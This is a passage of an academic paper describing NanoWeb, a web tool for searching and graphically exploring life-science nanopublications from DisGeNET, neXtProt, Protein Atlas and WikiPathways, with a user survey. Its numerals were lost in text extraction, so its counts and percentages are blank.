nanopublications per platform. platform number of nanopublication disgenet , , nextprot , , protein atlas , , wikipathways , total number of nanopublications , , giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.disgenet.org/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (piñero et al., ). disgenet is a knowledge management platform integrating and standardizing data about disease-associated genes and variants from multiple sources, including the scientific literature. disgenet covers the full spectrum of human diseases as well as normal and abnormal traits. queralt-rosinach et al. ( ) presented the publication of disgenet human gene-disease associations (gdas) as a new linked dataset exploiting the nanopublication approach. disgenet provides roughly half of the nanopublications, about million, available in nanoweb. � nextprot: (https://www.nextprot.org/) “nextprot is a protein knowledge platform that aims to support end-user research on human proteins” (chichester et al., ). chichester et al. ( ) converted data from nextprot into nanopublications to show how they can be used to seamlessly query the data and gain biological insight. in particular, they converted three types of annotations of interest for the biomedical community: variation data, posttranslational modification (ptm), and tissue expression. � protein atlas: (https://www.proteinatlas.org/) “a human pathology atlas has been created as part of the human protein atlas program to explore the prognostic role of each protein-coding gene in each cancer type by means of transcriptomics and antibody-based profiling” (uhlen et al., ). the human protein atlas is an open- access knowledge-base providing the data to allow genome-wide exploration of the impact of individual proteins on clinical outcomes. the human protein atlas (hpa) programme aims to “generate a comprehensive atlas of protein expression patterns in human normal and cancer tissues as well as cell lines” (pontén, jirström & uhlen, ). � wikipathways: (https://www.wikipathways.org/) “wikipathways is an open, collaborative platform dedicated to the curation of biological pathways” (slenter et al., ; waagmeester et al., ). wikipathways provides rich pathway databases with a focus on genes, proteins and metabolites. the data from wikipathways have been converted into a dataset of nanopublications as explained in kuhn et al. ( ). association analysis disgenet accounts for roughly half the total number of nanopublications in nanoweb. the assertions encoded by these nanopublications are divided into gene-disease associations of different types. in fig. , we report the number of assertions in nanoweb for each association of the disgenet ontology. a detailed description of the associations is available in the disgenet website (https://www.disgenet.org/dbinfo#section ). in the same vein, table reports the genes-tissues association types present in nextprot nanopublications. in particular, the protein-coding gene expression in tissue association describes the relationship between a protein-coding gene in directing the production of proteins expressed in a tissue. another type of association regarding proteins is the protein expression in tissue which describes the expression level (high, low, medium, not detected) of a protein in a tissue. besides, the sequence on amino-acid association describes the relationship between proteins and amino acids. the total number of nanopublication assertions regarding protein associations is over million. giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.nextprot.org/ https://www.proteinatlas.org/ https://www.wikipathways.org/ https://www.disgenet.org/dbinfo#section http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ scientific evidences nanopublication assertions are supported by evidences; an evidence can be a scientific publication, a curated database record or both. the nanopublication evidences in nanoweb come from several institutional open-access databases such as bgee (https://bgee.org/), cancer sanger (https://cancer.sanger.ac.uk/), ebiquickgo (https://www.ebi.ac.uk/quickgo/), gene expression omnibus (geo) (https://www.ncbi.nlm.nih.gov/geo/), protein atlas (https://www.proteinatlas.org/) and uniprot (https://www.uniprot.org/). we report the evidence databases associated to the nanopublications available in nanoweb in table . the total number of evidences collected from authoritative databases are about million, and the evidences coming from publications are more than million. all these publications are available in the pubmed (https://pubmed.ncbi.nlm.nih.gov/) database. nanoweb graphical user interface the nanoweb system, available at http://w id.org/nanoweb/, provides an interactive web interface that the user can use to search, access, explore, and cite nanopublications. a demo video presenting nanoweb functionalities is available at https://bit.ly/nwurl . association gene disease association therapeutic biomarker chromosomal rearrangement susceptibility mutation somatic causal mutation genomic alterations genetic variation causal mutation germline causal mutation altered expression post-translational modification fusion gene modifying mutation somatic modifying mutation germline modifying mutation is-a is-a is-a is-a is-a is-a sio_ , , is-a , , , , , , , , sio_ sio_ sio_ sio_ sio_ sio_ sio_ sio_ sio_ sio_ sio_ sio_ sio_ sio_ sio_ sio_ , , , figure disgenet ontology: number of assertions (yellow) for each disgenet association type. full-size doi: . /peerj-cs. /fig- giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://bgee.org/ https://cancer.sanger.ac.uk/ https://www.ebi.ac.uk/quickgo/ https://www.ncbi.nlm.nih.gov/geo/ https://www.proteinatlas.org/ https://www.uniprot.org/ https://pubmed.ncbi.nlm.nih.gov/ http://w id.org/nanoweb/ https://bit.ly/nwurl http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure shows the nanoweb search interface. at the top of the page, there is the query input form ( ), where the user types the query and searches for nanopublications. there is a button ( ) to pin or unpin the query input form on the right side of the query input form. the query input form is unpinned by default; this means that it floats at the top of the page so that it is always visible to the user even when the page is scrolled. the user can press the button to pin the query input form, making it hidden when the page is scrolled. on the left side of the query input form, there is the menu button ( ). by clicking on it, the sidebar appears with a list of links to the web app functionalities: . home: takes the user to the home page. . stats: takes the user to the web page summarizing the nanoweb system statistics, such as the number of nanopublications and triples inserted in the database. table assertion numbers for association types: “protein-coding gene expression in tissue” and “protein expression in tissue”. association number of assertion protein-coding gene expression in tissue (generic) protein-coding gene expression in tissue with quality high , protein-coding gene expression in tissue with quality low , protein-coding gene expression in tissue with quality medium , protein-coding gene expression in tissue with quality negative , protein-coding gene expression in tissue with quality not detected , protein-coding gene expression in tissue with quality positive , , protein-coding gene expression in tissue (total) , , protein expression in tissue with level high , protein expression in tissue with level low , protein expression in tissue with level medium , protein expression in tissue with level not detected , protein expression in tissue (total) , , sequence on amino-acid , protein associations (total) , , table number of evidences per database. database number of evidences bgee , , cancer sanger ebiquickgo , gene expression omnibus (geo) , protein atlas , , uniprot , total number of evidences , , giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . about: takes the user to the page that briefly describes the purpose of the nanoweb system and summarizes the provided functionalities. . contacts: leads to a page with contact information of the authors of this project. the body of the web interface consists of three layers displayed alternatively: � nanopublications list (fig. a) a list of nanopublications retrieved for the user query. each nanopublication is represented with a row in the list, reporting the following information: . the title of the nanopublication ( a). . the assertion of the nanopublication ( b). . a link to the source platform of the data ( c). for instance, in fig. the source platform of the data is disgenet. . the graph button to display the graph associated with the nanopublication ( d). when the user clicks this button, the graph layer appears to show the nanopublication graph on the right side of the nanopublications list. if the information layer is displayed, it is replaced with the graph layer. the load more button (fig. . ) loads more relevant nanopublications associated with the query, if any. as we can see in fig. , when a user clicks on a specific row, the information layer is displayed, showing the information regarding the selected nanopublication. � the information layer shows information associated with a selected nanopublication, including: . assertion: (fig. . ) this section reports the assertion of the nanopublication of interest and its title. besides, meaningful entities, such as the disease colorectal carcinoma, are reported as links to external knowledge bases. . publication info: (fig. . ) this section reports the publication information of the clicked nanopublication. this information includes the creation date, the creators, and the source platform. moreover, a link to the data record is provided so that the user can be redirected to the data record about the assertion; these links act as entry points to external scientific databases. for instance, fig. shows the data record web page for the nanopublication with title: mutl homolog —colorectal carcinoma in disgenet. . provenance: (fig. . ) this section shows the provenance information such as the evidence source and how the nanopublication was generated. it also reports the abstract of the publication, if present. . cite: (fig. . ) this section shows the citation snippet of the nanopublication. the user can copy the citation text by clicking on the cite this nanopub button in the header. giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the user can expand/collapse each section by clicking on the title or in the header section. � graph layer: fig. shows the graph layer displayed on the right side of the nanopublications list after the user click. this layer shows the graph associated with the nanopublication, leveraging on the rdf triple structure. each graph node corresponds to the subject or the object of an assertion, while the edge represents the predicate. each assertion is represented with a directed edge. the figure shows the graph associated with the mutl homolog —colorectal carcinoma nanopublication. the assertion within this nanopublication has two nodes: mutl homolog as the subject and colorectal carcinoma as the object. the subject—a gene—is colored in green, while the object—a disease—is in red. the predicate connecting the two is represented as an oriented grey edge. there are different ways to interact with the nanopublication graph. for instance, the user can click on a node to expand the relation network and visualize other nodes connected to the nanopublication of interest. the complete list of the user graphic controls available can be consulted by clicking on the controls help button indicated with number three in fig. . the figure shows a two-levels expansion starting from the subject node mutl homolog and ending with the expansion of the node associated to the colorectal cancer disease. the possible actions that a user can perform on the graph are: —expand/collapse graph network: when the user left-clicks on an unexpanded node, the graph is expanded. thus its relation network is shown. otherwise, if the user clicks on an already expanded node, the graph collapses, and in turn, its relation network is hidden. —show node information: when the user right-clicks on a node, a dialog modal window appears to show the information concerning that node. for instance, the information window shows the type of entity node clicked, such as gene or disease in case of nodes coming from nanopublications concerning biological or medical fields. —show edge information: when the user left-clicks on edge, a dialog modal window appears to show the information regarding the nanopublication. figure shows that when the edge connecting muts homolog and carcinogenesis is clicked, the nanopublication information window appears on the right side. the modal dialog window contains the same information of the information layer. still, it has a smaller width and can be dragged anywhere inside the graph layer, so it is always accessible without covering it. —drag and drop: the user can drag and move the nanopublication graph by pressing the mouse’s left button and moving it around the graph layer. when the desired position has been chosen, the user can release the left button of the mouse to drop the graph. giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ —zoom in/out: using the mouse wheel, the user can zoom in or out on the nanopublication graph. —switch between graph and information layers: a button is provided to switch between graph and information layers. for instance, when the graph layer is displayed to go back to the information layer, the user can click on the show nanopub info button (fig. . ). in the same way, when the information layer is displayed, the user can switch to the graph layer by clicking the show graph layer button. —rearrange layers: the navbar menu manages layers disposition (fig. . ) and it is provided with the following buttons: . nanopub list only: it shows a full-screen view of just the nanopublications list layer. . display both: it opens a two-layers view consisting of the nanopublications list layer and the currently active layer between graph and information layers. for instance, fig. shows the graph layer on the right side of the nanopublications list layer. . graph only/nanopub info only: it shows a full-screen view of the current layer, which can be the graph layer or the information layer. for instance, fig. shows this button with the text “graph only”, since the graph layer is active. graph exploration figure shows a multi-level graph exploration for the nanopublication with the title mutl homolog —colorectal carcinoma, which describes a gene-disease association. this functionality allows the user to explore the relation network of the considered nanopublications. besides, the graph exploration allows the user to understand how and why different nanopublications are connected. there is no limit to the depth of the exploration, that is, to the graph’s dimension visualized. the user can potentially expand the graph at will until all the nodes connected in the relation network are displayed. in this way, the synthesis power of nanopublications is enhanced by the value of the relation network; it provides a greater information contribution than the sum of the single nanopublications taken separately. since the graph can have a high density of connections, only a portion of the connected nodes is shown for a new graph expansion request. however, the user could be interested in a specific connection between two nodes, which may not be shown by default. hence, it is possible to search for specific connections directly on the nanopublication semantic network—we call this functionality “connected entities search”. figure shows the connected entities search in action. in particular, we see the entities connected to the mutl homolog gene. when the user right-clicks on the node associated with the mutl homolog gene, the information window is shown on the right side. inside the information window, there is the “connected entities” input field, where the user can specify the entity name s/he is looking for. for instance, when the user types polyposis, a list of matching entities appear, and the user can choose which entities to add to the graph by clicking on the plus button. using the connected entities search, users can quickly verify whether a direct link between two nodes exists. the “connected entities search” is provided with auto-completion to ease the work of the user. giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ implementation specifications nanoweb back-end is developed using django (https://www.djangoproject.com/), which is a python-based free and open-source web framework. the web app front-end is developed using html , css , bootstrap framework (https://getbootstrap.com/), javascript, jquery (https://jquery.com/) and the library d .js. (https://d js.org/). in particular, to draw the nanopublication graphs, we used the d force layout, (https://d -wiki.readthedocs.io/zh_cn/master/force-layout/) which is specifically designed to implement force-directed graphs. a force-directed graph is a graph where nodes are subjected to forces of two types: attractive and repulsive. these kinds of forces try to simulate physics scenarios where particles attract or repel each other. here, the particles are the nodes of the graph, and the edges represent the presence of forces between nodes. when a new instance of a force-directed layout is created, a new d simulation starts, and the nodes become subjected to forces. the force-directed layout can be used both for cyclic and acyclic graphs, which can be either directed or not. to implement the graph exploration, we developed a custom, collapsible force-directed layout where nodes can be expanded or collapsed at will. this layout enables a user- friendly exploration of graphs leveraging on a functional disposition of children nodes around the parents. in particular, fig. shows that children nodes are displayed around parents at evenly spaced angles of an arc. this disposition is designed to facilitate the horizontal figure nanoweb search interface with user-provided query: colorectal cancer. full-size doi: . /peerj-cs. /fig- giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.djangoproject.com/ https://getbootstrap.com/ https://jquery.com/ https://d js.org/ https://d -wiki.readthedocs.io/zh_cn/master/force-layout/ http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ expansion of the graph and prevent nodes from overlapping in a multi-level expansion. the custom force-directed layout developed and the nanoweb code are publicly available (https://github.com/giachell/nanoweb). advanced search in addition to keyword search, we introduced the advanced search to guide users in query formulation. the advanced search is based on structured terms that can be general purpose (e.g., nanopublication urls, author orcid and scientific evidence identifiers) or figure information layer for the nanopublication. full-size doi: . /peerj-cs. /fig- giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/giachell/nanoweb http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ domain-specific (e.g., genes, diseases, proteins and tissues). figure shows one of the configurations available in the advanced search interface. the interface is based on filters enabling the users to perform boolean search and restrict the search results. users can choose the search modality in the search by drop-down menu, marked with number one in fig. . the interface provides four different search modalities: . topic: topic-based search is domain-specific, and it allows the user to find nanopublications for a specific topic. currently, the available topics are genes, diseases, proteins, and tissues. the user can specify the chosen topic in the choose topic drop- down menu, indicated with number two in fig. . the user can also specify the name of the entity that s/he is looking for in the entity name input field, marked with number three in fig. . for instance, in fig. the chosen topic is gene and the gene name is mutl homolog . since gene and protein names could be quite complex to remember, the entity name input field is provided with and auto-completion functionality. once the user specifies the details about the topic, the list of related nanopublications is returned, so that the user can visualize and explore them as described for the keyword search interface. . author: allows the user to find all the nanopublications related to a nanopublication/ evidence author. the provided author could be a nanopublication author or the author figure data record for the nanopublication with title: mutl homolog —colorectal carcinoma. full-size doi: . /peerj-cs. /fig- giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ of the scientific publications containing the evidence of nanopublication assertions. users can search for a specific author by providing the author’s name or her/his orcid identifier. the author input field is provided with auto-completion for both author names and orcid identifiers. . nanopublication id: using this mode, users can search for a specific nanopublication via its identifier/url. the users can take advantage of the auto-completion feature to search for all the nanopublications. . evidence: this mode allows the users to get all the nanopublications extracted from a given scientific publication (i.e., evidence) starting from the publication doi or pubmed url (e.g., http://identifiers.org/pubmed/ ). to define the advanced search interface filters we used structured terms (entities) collected from several public ontologies, databases and terminology resources concerning both life science and medical domains. for instance, we consider genes, diseases, proteins and tissues categories that users can use as filters. the machine-readable versions of the entities are contained in the nanopublications indexed by nanoweb. to obtain their human-readable version, we leverage on public ontologies and databases. from these resources the associated labels are extracted, stored into the nanoweb database and then linked to the respective machine-readable entities. to do so, we used some ontologies: basic formal ontology (bfo) (https://basic-formal-ontology.org/), chemical entities of biological interest ontology (chebi) (https://www.ebi.ac.uk/chebi/), evidence and conclusion ontology (eco) (https://www.evidenceontology.org/), open biological and biomedical ontology (obo) (http://www.obofoundry.org/), pathway ontology (pw) (https://rgd.mcw.edu/rgdweb/ontology/search.html). semanticscience integrated ontology (sio) (https://github.com/maastrichtu-ids/semanticscience), sequence ontology (so) (http://www.sequenceontology.org/). additionally, as terminology resources we employed the national center for biotechnology information (ncbi) (https://www.ncbi.nlm.nih.gov/ ), national cancer institute thesaurus (ncit) (https://ncit.nci.nih.gov/ncitbrowser/) and the unified medical language system (umls) (https://www.nlm.nih.gov/research/ umls/index.html). the entities extracted from the resources mentioned above are also used for the mapping of nanopublication assertions—originally modeled as machine-readable rdf statements—into a human-readable form. to do so, nanoweb exploits the entity types to determine the proper visual representation of nanopublication assertions. for instance, in the case of a disgenet gene-disease association (dgn-gda), the entity types are gene or disease. the entities are represented as nodes labeled with the human- readable versions of the corresponding uri used in the rdf serialization of the nanopublication. the nodes are connected together by an oriented edge from gene to disease. as an example let us consider the assertion of the nanopublication with identifier: ra wlhsgfzrdu kulrsa_pta gk -mwadaj-lz kaqpog: miriam −gene : a ncit : c . l l d : c a ncit : c . giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://identifiers.org/pubmed/ https://basic-formal-ontology.org/ https://www.ebi.ac.uk/chebi/ https://www.evidenceontology.org/ http://www.obofoundry.org/ https://rgd.mcw.edu/rgdweb/ontology/search.html https://github.com/maastrichtu-ids/semanticscience http://www.sequenceontology.org/ https://www.ncbi.nlm.nih.gov/ https://ncit.nci.nih.gov/ncitbrowser/ https://www.nlm.nih.gov/research/umls/index.html https://www.nlm.nih.gov/research/umls/index.html http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ dgn−gda : dgna c d a e f f f d sio : sio_ miriam −gene : , lld : c ; a sio : sio_ . the assertion describes a gene-disease association (dgn-gda) between the ncbi gene amyloid beta precursor protein (miriam-gene: ) and the alzheimer’s disease (lld: c ). the association type is more specifically a gene-disease biomarker association (sio: ). nanoweb enriches the entities with additional information that can figure graph layer for the nanopublication clicked by the user. full-size doi: . /peerj-cs. /fig- giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ be inferred from the rdf graph of the nanopublication. for instance, additional information are the types of the entities—for example, the fact that first entity (miriam- gene: ) is a gene (ncit:c ) and that (lld:c ) is a disease (ncit:c ). all these additional information are treated as entity properties that the user can access via the interactive visual representation of the nanopublication. the entity labels amyloid beta precursor protein and alzheimer’s disease are taken respectively from the ncbi and linked life data platforms. the entity labels are resolved from entity identifiers by relying on public api endpoints such as the entrez programming utilities (e-utilities) figure graph exploration: search for mutl homolog (mlh ) connected entities. full-size doi: . /peerj-cs. /fig- figure graph exploration: the information window for muts homolog —carcinogenesis is displayed as a result for the user click on the edge. full-size doi: . /peerj-cs. /fig- giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (https://www.ncbi.nlm.nih.gov/books/nbk /) provided by ncbi. nanopublications from the same platform (e.g., disgenet, nextprot, protein atlas, and wikipathways) use the same authorities to identify entities (e.g., genes, diseases, proteins and tissues). however, when nanopublications from different platforms are visualized, it is sometimes necessary to reconcile different resource identifiers across authorities to link the same entities to others using different identifiers. in the visual representation only one valid identifier is presented for each entity to keep the interface as clean as possible. expert users survey to better understand the needs of the nanopublication community and improve the critical functionalities of nanoweb, we conducted an expert users survey to collect feedback from nanopublication and domain experts. we advertised nanoweb on the nanopublication public mailing lists, on social media targeting the potentially interested communities and private emails to the authors of papers about nanopublications. we asked the nanopublication experts involved in the survey to use nanoweb, and then to answer a questionnaire. it should be noticed that we did not provide any tutorial to inform the users about nanoweb functions because we also wanted to investigate how intuitive the system is for first-time users and how steep its learning curve is. the survey was composed of sixteen questions (q( – )) divided in four sections. the majority of the questions is answered through the likert five-point scale, ranging from to points, meaning different things depending on the question. figure advanced search: search for nanopublications regarding the mutl homolog gene. full-size doi: . /peerj-cs. /fig- giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.ncbi.nlm.nih.gov/books/nbk / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . personal information. this section is composed of four questions and collects basic information about the participants and their experience with nanopublications: � q : do you have any experience with nanopublications? in this case the answer with point in the likert scale means: “not at all” (i.e., i heard someone mentioning nanopublications once), while the points one means: “quite a lot” (i.e., i created some nanopublications myself) � q : current position? single choice between: academic, industry, master student, phd student, postdoc. � q : primary domain of expertise? multiple choices between: art and architecture, biology, chemistry, communication science, computers and the humanities, computer science, economics, life science, linguistics, mathematics, medicine, physics, psychology, sociology. the survey considered fourteen participants in total, counting seven highly-experienced users ( on the likert scale) and nine experienced users ( on the likert scale). according to the data collected, the majority of the participants ( . %) are from academia. also, according to q , the main domains of expertise of the participants are: computer science ( . %), chemistry ( . %), life science ( . %), biology ( . %), medicine ( . %). computer science indicates experts in the creation of nanopublications from the technical viewpoint, whereas the others are domain experts who might curate or use nanopublications in their daily work. . the relevance of the addressed problem. this section explores the existence and quality of other services enabling search, access, exploration, and re-use of nanopublications (all questions are answered according to a (not at all) to (quite a lot) likert scale): � q : is searching, accessing, and consulting nanopublications relevant for the stakeholders (e.g., researchers, developers, domain experts)? � q : to the best of your knowledge, are the currently available tools and services adequate for searching and accessing nanopublications? � q : to the best of your knowledge, do other tools and services offer interactive visualizations to interact with nanopublications? � q : to the best of your knowledge, do other available tools and services offer visual exploration possibilities of the nanopublication relation network? according to the data collected for questions q( – ), the majority of the participants ( %) considers the problem addressed by nanoweb relevant or very relevant, pointing out the lack of other tools and services for the interactive visualization and exploration of nanopublications and their relation network. about q , % of the participants consider the currently available tools and services for searching and accessing nanopublications inadequate ( or points on the likert scale) and % are not enthusiastic about them ( points on the likert scale). % of the giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ participants answered that there are no other available tools offering interactive visualizations of nanopublications and % say there are no alternative tools to visually explore the nanopublication network . from these answers, we can see that the participants confirm our analysis highlighting the lack of intuitive and visual tools for the access and exploration of the nanopublications despite the confirmed utility of searching and accessing nanopublications for the stakeholders. . nanoweb—search engine and interface. the questions of this section are designed to evaluate the search capabilities of nanoweb and the usability of its interface. this section was answered by twelve participants over fourteen. � q : is nanoweb search interface intuitive and easy-to-use? � q : is nanoweb capable of retrieving relevant nanopublications for a given query? � q : in your opinion, is a search based on keywords an effective way to seek for nanopublications? � q( – ): in your opinion, for the not technologically savvy, what is the most effective way to search nanopublications? q and q are the same, but the answers are different since for q the range of answers is from : sparql end-point to : keyword-based search; whereas, for q the range is from : faceted search to : keyword search. � q : will nanoweb enhance the productivity of involved stakeholders (researchers, developers, nanopublication experts)? about question q , the majority of the participants consider nanoweb search interface intuitive and easy-to-use ( % answered or above and none answered below ). there is no accordance instead for q (median = , mean = . , std = . ), % of the participants answered which means “not sure” and the rest of them is divided into the two other classes “not really” (≤ : %) and “quite a lot” (≥ : %). one reason that could motivate this kind of distribution might be that participants did not know what they could search in advance, thus many user queries might have not produced the expected results. to address this issue, after the survey we introduced the advanced search which guides users on nanoweb search capabilities. participants are well-distributed for q (median = , mean = . , std = . ), there is not a preferred opinion about keyword search; nevertheless, % of the participants consider the search based on keywords quite an effective or highly effective (answer or above) way to seek for nanopublications. about q( – ), the majority of the participants ( %) consider that keyword-based search is more effective than sparql end-point but less effective than faceted search ( %) for the non-technologically savvy. this answer shows how domain experts are more accustomed to use faceted search rather than keyword search for searching structured data as nanopublications are. keyword search is considered useful, but it should not substitute faceted search as a means to access rdf scientific data. finally, all the participants believe nanoweb can moderately ( %) or substantially ( %) enhance the productivity of researchers and nanopublication experts. giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . nanoweb—visual exploration. this section of the questionnaire evaluates the experience with the nanoweb user interface for visual exploration of nanopublications. we designed the questions of this section to investigate whether the visual exploration of nanopublication graphs could lead to the discovery of meaningful relationships and information potentially unknown to the experts. moreover, we asked the participants to compare nanoweb with the currently available alternative tools. this section consists of three questions: � q : do you feel comfortable with the interface for the visual exploration? � q : could the visual exploration of the nanopublication graphs lead to the discovery of meaningful relationships and information not known in advance? � q : is nanoweb visual exploration innovative with respect to the currently available alternative tools and techniques? with reference to q , the majority ( %) of the participants felt very comfortable with the interface for the visual exploration and only % gave a score below three points. moreover, % of the participants believe the visual exploration of the nanopublication graphs could lead to the discovery of meaningful relationships and information not known in advance . finally, half of the participants think that nanoweb is highly innovative (four or five points) with respect to the state of the art, while only % thinks it is only marginally innovative. user feedback finally, we asked the participants to provide some feedback and suggestions to improve nanoweb. the feedback collected shows that users have appreciated the system: � “i very much appreciate the tool, and i think it can be a great push for better accessing and using nanopublications by everyone!” � “i consider the nanoweb proposal a smart insight for searching nanopublications.” we also received useful suggestions to improve the system: � “i found the visual exploration innovative, but i think it could be improved by a better ui/ux.” � “good work! i would suggest that you enable url-based searching.” � “consider replacement of keyword search with a concept-based search. this can also be used to enable auto-suggest functionality based on the resources (genes, diseases, etc)” � “i really like the application, but at the end of the day it is dependent on the indexed data. it would be great if there were a possibility to suggest datasets to be included or even better, to be able to add them myself!” � “downloading of the results as a dataset of nanopublications would be most welcome too. even better, a cytoscape plugin that allows me to pull in the full network. i’m looking forward to seeing where you are taking this. success!” giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we consider the user feedback of great value, so we decided to improve nanoweb according to the received suggestions. firstly, we improved both the user interface and experience (ui/ux), providing a responsive mobile device layout. then, we improved the search system so that a user can perform url-based searching. currently, nanoweb allows the users to find the authors from the orcid ids; a specific nanopublication from its url/identifier; and, all the nanopublications related to one particular evidence paper provided its doi. the prominent feature we added to nanoweb, thanks to the user feedback, is the advanced search, as described in “nanoweb graphical user interface”. the advanced search interface is based on structured terms extracted from the life science domain, it enables users to search for nanopublications based on topics (e.g., genes, diseases, proteins, etc.), scientific evidence and authors. finally, based on the collected feedback, we planned several further improvements to the system that we discuss as future work in “conclusions”. discussion on maintaining aspects nanoweb aims to provide users unified access to nanopublications and to search and explore them through a human-readable interface. since nanoweb is tailored for both the life science and medical domains, it is designed to help the experts of these domains in their research work. it also allows users that do not have a prior knowledge about nanopublication to easily interpret and understant the returned content. several challenges need to be addressed to maintain a stable, citable system like what nanoweb aims to be. the major system maintaining challenges are: . ensure persistent access and re-use of data: to guarantee persistent and reliable access to data and avoid broken urls, nanoweb uses persistent urls and identifiers to refer to resources. all the indexed nanopublications are directly accessible through a persistent url provided by the w c permanent identifier community group (https://w id.org/). the nanopublication’s persistent url format is: http://w id.org/ nanoweb/landingpage/<id>, where the id in brackets is the nanopublication identifier and satisfies the regular expression: ^ra[a-za-z - _\-]{ }$. nanopublications use persistent identifiers, that allow to access them across different providers. even if one of the several nanopublication providers is unreachable in a given moment, the others can provide access by using the same identifiers. as for nanopublications, nanoweb itself is reachable through the persistent url: http://w id.org/nanoweb/. . long-term preservation of resources: every information concerning nanopublications is saved in nanoweb databases, that are stored in network hard drives using redundancy policies such as redundant array of independent disks (raid). the redundancy policies adopted and daily back-up routines are designed to prevent loss of data and ensure long-term preservation. . ongoing hosting: nanoweb is hosted within the cloud architecture of the university of padova. the institutional cloud architecture and network infrastructure provide a giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://w id.org/ http://w id.org/nanoweb/landingpage/&#x c;id&#x e; http://w id.org/nanoweb/landingpage/&#x c;id&#x e; http://w id.org/nanoweb/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ reliable connection service as well as a protection layer from external attacks. a team of system administrators actively control the cloud/network infrastructure and support nanoweb. nanoweb is developed in the context of the european project examode which guarantees financial support until . within the project there are sustainability policies that should guarantee the maintenance of the developed tools well beyond the termination of the project. conclusions scientific and scholarly communications are growing at an incredible speed, and it is hardly possible to keep track of the discoveries and statements presented in the literature, even considering only a specific domain. moreover, the “redundancy of statements in multiple fora makes it difficult to identify attribution, quality, and provenance” (groth, gibson & velterop, ). hence, the nanopublication model has been proposed to quickly identify, search, and access scientific facts extracted from papers. nanopublications are represented as graphs centered on a scientific statement (i.e., the assertion) that makes provenance, attribution, and scientific information machine- readable. nanopublications are concise noise-free resources characterized by high information density. leveraging on the semantic-oriented rdf structure, nanopublications efficiently convey information and concepts. hence, these features make nanopublications particularly suitable for enabling data search, information extraction, and automatic reasoning over scientific facts. despite the promising features of nanopublications, their use is still restricted to highly-specialized scientific circles. the central limit to the full exploitation of nanopublications is the lack of services enabling their search, access, exploration, and re-use. search is limited to the use of structured query languages as sparql, and a service to search over all the publicly available nanopublications at once is not available. nanopublications are machine- readable, but no human-readable counterpart is generated and open to the public. nanopublications create a vast relation network of scientific facts that could lead to discoveries, but up to now, there are no automatic or manual services enabling graph exploration. the goal of this work is to provide unified access to life science nanopublications in order to allow users to search, access, explore, and re-use them on the web. to this end, we have designed and developed a web application called nanoweb, that allows the users to (i) search for domain-specific nanopublications using keywords (as they are accustomed to do with web search engines); (ii) explore their relation network to discover new nanopublications and meaningful connections; (iii) access and understand their content; (iv) connect to the evidence paper and access the related data record in external curated scientific databases; and, (v) easily cite nanopublications when they are re-used in new scientific contexts. we also presented the benefits of the serendipity-oriented perspective enabled by nanoweb in the life science domain. we showed how the exploration of nanopublication european union horizon program under grant agreement no. . giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ graphs could enrich domain knowledge and point out interesting gene-disease connections. as future work, we plan to extend the system by providing the user with the capability of exploring a new graph generated from an arbitrary set of life science nanopublications selected by the user. this functionality represents a significant improvement for the graph exploration since the initial relation network already considers different nanopublications, instead of starting the graph exploration from a single one. in this way it is possible to highlight, for instance, the set of common diseases due to a selection of genes or, conversely, the set of common genes that cause the disease of interest. moreover, we plan to crawl and index the life science nanopublications that are not currently available on the web, if not downloading large archive files which are hardly usable. as future work, we plan to further improve nanoweb according to the expert users survey’s feedback. we will allow the users to add datasets or other domain-specific nanopublication sources to be crawled and indexed by the system. we will add the possibility to select and download custom-made sets of nanopublications. we will propose a customized user experience to save lists of favorite nanopublications, entities, and associations and notify when something new is published. we will dedicate a fair amount of work to the extension of search functionalities to improve keyword search and to include faceted search which is required by the stakeholders. indeed, faceted search is commonly adopted solution (arenas et al., ) to search rdf data. a faceted search is particularly useful when it is applied to domain- specific data. for instance, in gene-disease associations, the faceted search can be used to search for specific genes or specific diseases, filtering out all the entities not relevant to the search. faceted search can be associated with auto-completion functionalities to ease the users’ work. finally, we plan to improve keyword-based searches with ontology and database id lookups. acknowledgements the authors wish to thank erika 